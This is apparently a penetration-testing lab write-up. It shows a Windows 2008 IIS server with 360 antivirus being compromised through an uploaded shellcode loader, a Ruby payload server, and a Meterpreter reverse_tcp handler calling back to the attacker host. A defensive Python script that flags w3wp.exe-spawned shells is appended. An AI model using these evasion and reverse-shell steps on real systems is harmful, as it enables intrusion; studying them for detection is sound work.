Focused on APT attack and defense
https://micropoor.blogspot.com/

Attacker machine: 192.168.1.4 (Debian)
Target machine: 192.168.1.2 (Windows 2008)
Installed on the target: 360 Safeguard (360卫士) + 360 Antivirus (360杀毒)

```
[*] 磁盘列表 [C: D: E:]

C:\inetpub\wwwroot\>tasklist

映像名称                       PID 会话名   会话#    内存使用
System Idle Process              0          0         24 K
System                           4          0        372 K
smss.exe                       236          0        956 K
csrss.exe                      324          0      5,572 K
csrss.exe                      364          1     14,452 K
wininit.exe                    372          0      4,508 K
winlogon.exe                   408          1      5,364 K
services.exe                   468          0      7,376 K
lsass.exe                      476          0      9,896 K
lsm.exe                        484          0      3,876 K
svchost.exe                    576          0      8,684 K
vmacthlp.exe                   632          0      3,784 K
svchost.exe                    676          0      7,384 K
svchost.exe                    764          0     12,716 K
svchost.exe                    800          0     29,792 K
svchost.exe                    848          0     11,248 K
svchost.exe                    900          0      9,308 K
svchost.exe                    940          0     16,184 K
svchost.exe                    332          0     11,800 K
spoolsv.exe                    548          0     15,568 K
svchost.exe                   1052          0      8,228 K
svchost.exe                   1076          0      8,808 K
svchost.exe                   1144          0      2,576 K
VGAuthService.exe             1216          0     10,360 K
vmtoolsd.exe                  1300          0     18,068 K
ManagementAgentHost.exe       1332          0      8,844 K
svchost.exe                   1368          0     11,884 K
WmiPrvSE.exe                  1768          0     13,016 K
dllhost.exe                   1848          0     11,224 K
msdtc.exe                     1940          0      7,736 K
WmiPrvSE.exe                  1440          0     19,768 K
mscorsvw.exe                   296          0      4,732 K
mscorsvw.exe                   584          0      5,088 K
sppsvc.exe                    1476          0      8,408 K
taskhost.exe                  2612          1      6,344 K
dwm.exe                       2868          1      4,604 K
explorer.exe                  2896          1     44,912 K
vmtoolsd.exe                  3008          1     17,744 K
TrustedInstaller.exe          2268          0     15,776 K
360Tray.exe                   2684          1      6,056 K
360sd.exe                     2636          1      1,316 K
ZhuDongFangYu.exe             2456          0     14,292 K
360rp.exe                     1712          1     27,072 K
SoftMgrLite.exe                864          1     16,816 K
w3wp.exe                      3300          0     42,836 K
svchost.exe                   3840          0      4,584 K
notepad.exe                   3712          1      5,772 K
cmd.exe                       3384          0      2,376 K
conhost.exe                   3520          0      3,420 K
tasklist.exe                  3096          0      5,276 K
```

```
C:\>dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 C6F8-9BAB

 C:\ 的目录

2017/12/13  03:28              inetpub
2009/07/14  11:20              PerfLogs
2017/12/13  03:28              Program Files
2019/01/23  14:09              Program Files (x86)
2019/01/23  14:15              Users
2017/12/13  03:25              Windows
               0 个文件              0 字节
               6 个目录 21,387,132,928 可用字节
```

The target is 64-bit Windows 2008:

```
C:\>ver

Microsoft Windows [版本 6.1.7600]
```

Configure the payload:

```ruby
root@John:/var/www/html# cat ./Micropoor_rev.rb
require 'socket'

# Usage check: the listening port is the only argument.
if ARGV.empty?
  puts "Usage:"
  puts "Micropoor.rb port"
  exit
end

PORT = ARGV.first.to_i

# Each connecting client receives the payload bytes and is then disconnected.
def handle_connection(client)
  puts "Payload is on-line #{client}"

  client.write("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")
  client.close
end

# Listen on all interfaces and serve every connection in its own thread.
socket = TCPServer.new('0.0.0.0', PORT)
puts "Listening on #{PORT}."

while client = socket.accept
  Thread.new { handle_connection(client) }
end

root@John:/var/www/html# ruby ./Micropoor_rev.rb 8080
Listening on 8080.
```

Upload Micropoor_shellcode_x64.exe.

Configure msf:

```
msf exploit(multi/handler) > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.4      yes       The listen address (an interface may be specified)
   LPORT     53               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.4:53
```

Execute on the target:

```
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.4:53
[*] Sending stage (206403 bytes) to 192.168.1.2
[*] Meterpreter session 6 opened (192.168.1.4:53 -> 192.168.1.2:49744) at 2019-01-23 01:29:00 -0500

meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > sysinfo
Computer        : WIN-5BMI9HGC42S
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:bc:0d:5c
MTU          : 1500
IPv4 Address : 192.168.1.2
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::5582:70c8:a5a8:8223
IPv6 Netmask : ffff:ffff:ffff:ffff::
```

```
meterpreter > ps

Process List
============

 PID   PPID  Name                         Arch  Session  User                        Path
 ---   ----  ----                         ----  -------  ----                        ----
 0     0     [System Process]
 4     0     System
 236   4     smss.exe
 296   468   mscorsvw.exe
 324   316   csrss.exe
 332   468   svchost.exe
 364   356   csrss.exe
 372   316   wininit.exe
 408   356   winlogon.exe
 468   372   services.exe
 476   372   lsass.exe
 484   372   lsm.exe
 548   468   spoolsv.exe
 576   468   svchost.exe
 584   468   mscorsvw.exe
 632   468   vmacthlp.exe
 676   468   svchost.exe
 764   468   svchost.exe
 800   468   svchost.exe
 848   468   svchost.exe
 864   2684  SoftMgrLite.exe
 900   468   svchost.exe
 940   468   svchost.exe
 1052  468   svchost.exe
 1076  468   svchost.exe
 1144  468   svchost.exe
 1216  468   VGAuthService.exe
 1300  468   vmtoolsd.exe
 1332  468   ManagementAgentHost.exe
 1368  468   svchost.exe
 1440  576   WmiPrvSE.exe
 1476  468   sppsvc.exe
 1712  2636  360rp.exe
 1768  576   WmiPrvSE.exe
 1848  468   dllhost.exe
 1940  468   msdtc.exe
 2456  468   ZhuDongFangYu.exe
 2612  468   taskhost.exe
 2636  1096  360sd.exe
 2684  1096  360Tray.exe
 2788  3408  Micropoor_shellcode_x64.exe  x64   0        IIS APPPOOL\DefaultAppPool  C:\inetpub\wwwroot\Micropoor_shellcode_x64.exe
 2868  900   dwm.exe
 2896  2852  explorer.exe
 3008  2896  vmtoolsd.exe
 3196  468   svchost.exe
 3300  1368  w3wp.exe                     x64   0        IIS APPPOOL\DefaultAppPool  c:\windows\system32\inetsrv\w3wp.exe
 3408  3300  cmd.exe                      x64   0        IIS APPPOOL\DefaultAppPool  C:\Windows\system32\cmd.exe
 3712  2896  notepad.exe
 4092  324   conhost.exe                  x64   0        IIS APPPOOL\DefaultAppPool  C:\Windows\system32\conhost.exe

meterpreter >
```

Target:

Appendix: Micropoor_shellcode for payload backdoor
https://micropoor.blogspot.com/2019/01/micropoorshellcode-for-payload-backdoor.html

Micropoor
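From the defender's side, the `ps` listing above is the most useful artifact on this page: an executable in C:\inetpub\wwwroot\ running as IIS APPPOOL\DefaultAppPool, spawned by cmd.exe, which was itself spawned by the IIS worker process w3wp.exe. The script below is an added example (it is not code from the original post or from the Micropoor project) that parses a Meterpreter `ps`-style process table and flags exactly that chain. The sample rows are constructed to match the columns shown above; the web-root path and the set of images treated as command shells are assumptions chosen for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample in the column layout of Meterpreter's `ps` output
# (PID, PPID, Name, Arch, Session, User, Path). Rows without Arch/User/Path
# are processes the session could not inspect, as in the listing above.
SAMPLE_PS = r"""
 PID   PPID  Name                         Arch  Session  User                        Path
 ---   ----  ----                         ----  -------  ----                        ----
 0     0     [System Process]
 4     0     System
 236   4     smss.exe
 324   316   csrss.exe
 468   372   services.exe
 1368  468   svchost.exe
 2684  1096  360Tray.exe
 2788  3408  Micropoor_shellcode_x64.exe  x64   0        IIS APPPOOL\DefaultAppPool  C:\inetpub\wwwroot\Micropoor_shellcode_x64.exe
 3300  1368  w3wp.exe                     x64   0        IIS APPPOOL\DefaultAppPool  c:\windows\system32\inetsrv\w3wp.exe
 3408  3300  cmd.exe                      x64   0        IIS APPPOOL\DefaultAppPool  C:\Windows\system32\cmd.exe
 3712  2896  notepad.exe
 4092  324   conhost.exe                  x64   0        IIS APPPOOL\DefaultAppPool  C:\Windows\system32\conhost.exe
"""

# Assumptions for this example: the IIS web root, and the images that count
# as an interactive shell when they descend from a worker process.
WEB_ROOT = "c:\\inetpub\\wwwroot\\"
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    user: Optional[str] = None
    path: Optional[str] = None


def parse_ps(text: str) -> Dict[int, Proc]:
    """Parse the ps table; columns are separated by two or more spaces."""
    procs: Dict[int, Proc] = {}
    for line in text.splitlines():
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) < 3 or not cols[0].isdigit():
            continue  # blank line, header or separator row
        user = cols[5] if len(cols) >= 6 else None
        path = cols[6] if len(cols) >= 7 else None
        procs[int(cols[0])] = Proc(int(cols[0]), int(cols[1]), cols[2], user, path)
    return procs


def ancestry(procs: Dict[int, Proc], pid: int, limit: int = 64) -> List[Proc]:
    """Walk PPID links: [process, parent, grandparent, ...]; stops at unknown or repeated PIDs."""
    chain: List[Proc] = []
    seen = set()
    while pid in procs and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def find_webshell_chains(procs: Dict[int, Proc]) -> List[Tuple[int, str, str]]:
    """Return (pid, 'root -> ... -> leaf', reason) for suspicious app-pool processes."""
    hits: List[Tuple[int, str, str]] = []
    for p in procs.values():
        if not (p.user or "").upper().startswith("IIS APPPOOL\\"):
            continue  # only processes running under an IIS application pool identity
        chain = ancestry(procs, p.pid)
        under_w3wp = any(a.name.lower() == "w3wp.exe" for a in chain[1:])
        in_webroot = (p.path or "").lower().startswith(WEB_ROOT)
        is_shell = p.name.lower() in SHELL_IMAGES
        reasons = []
        if in_webroot:
            reasons.append("image executes from the web root")
        if under_w3wp and is_shell:
            reasons.append("command shell descended from w3wp.exe")
        if reasons:
            tree = " -> ".join(a.name for a in reversed(chain))
            hits.append((p.pid, tree, "; ".join(reasons)))
    return sorted(hits)


if __name__ == "__main__":
    for pid, tree, reason in find_webshell_chains(parse_ps(SAMPLE_PS)):
        print(f"PID {pid}: {tree}  [{reason}]")
```

Run against the sample it reports two processes, 2788 and 3408, each with the full chain services.exe -> svchost.exe -> w3wp.exe -> cmd.exe (-> Micropoor_shellcode_x64.exe); w3wp.exe itself and conhost.exe are not flagged because neither runs from the web root nor is a shell below the worker process. The same two conditions (parent image w3wp.exe, or an image path under the web root) map directly onto process-creation telemetry such as Sysmon ProcessCreate events, which is where a production detection would live.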